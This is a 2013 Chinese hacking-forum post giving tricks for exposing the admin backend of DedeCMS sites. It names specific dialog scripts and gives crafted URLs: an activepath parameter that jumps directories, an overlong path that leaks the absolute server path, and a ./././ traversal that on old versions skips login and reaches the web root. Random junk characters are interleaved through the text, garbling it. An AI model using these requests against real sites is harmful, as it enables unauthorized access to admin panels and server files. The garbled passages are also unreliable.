找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2214|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
- E/ c' }, t; E, `
! h. f3 n# J% S8 l. Y5 t员帐号,新版本的就直接转向了后台.
4 I4 F  q9 L. ~/ X, {% C- _# O# l+ i- m2 q+ d' J# t4 Y: ]! V' f! x
2.include/dialog/config.php会爆出后台管理路径/ r4 J* @: g) ~9 M* i
$ |. B% k' p" X# G6 r
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录" V  ~' k, ]# A; t

7 D. {  o& K9 L" W  ^/ i5 ~* m4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
9 m( R5 b8 Z  o0 D7 X. x; O7 ^0 n
1 S8 f* A0 i0 F" }) e5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
/ c  R# c, ?9 {: s. h5 M9 C- l3 o' d2 d! k) B
到根目录去.不过这些版本的访问地址有些不同.' [" O/ X9 l( ~; F+ k7 t+ A
地址为require/dialog/select_soft.php?activepath=/././././././././! X/ {: h* _) A# {
- r5 c; t8 ]+ j! M0 T
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
% W/ }4 _* \( u2 V存在相同问题的文件还有& m- Q5 \  [6 W- W3 @2 s
include\dialog\select_images.php
! _6 L8 h" S5 d, Yinclude\dialog\select_media.php, J; ^- ?: \* M' m' ~* T
include\dialog\select_templets.php​+ W. V* S. K: q! P1 w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表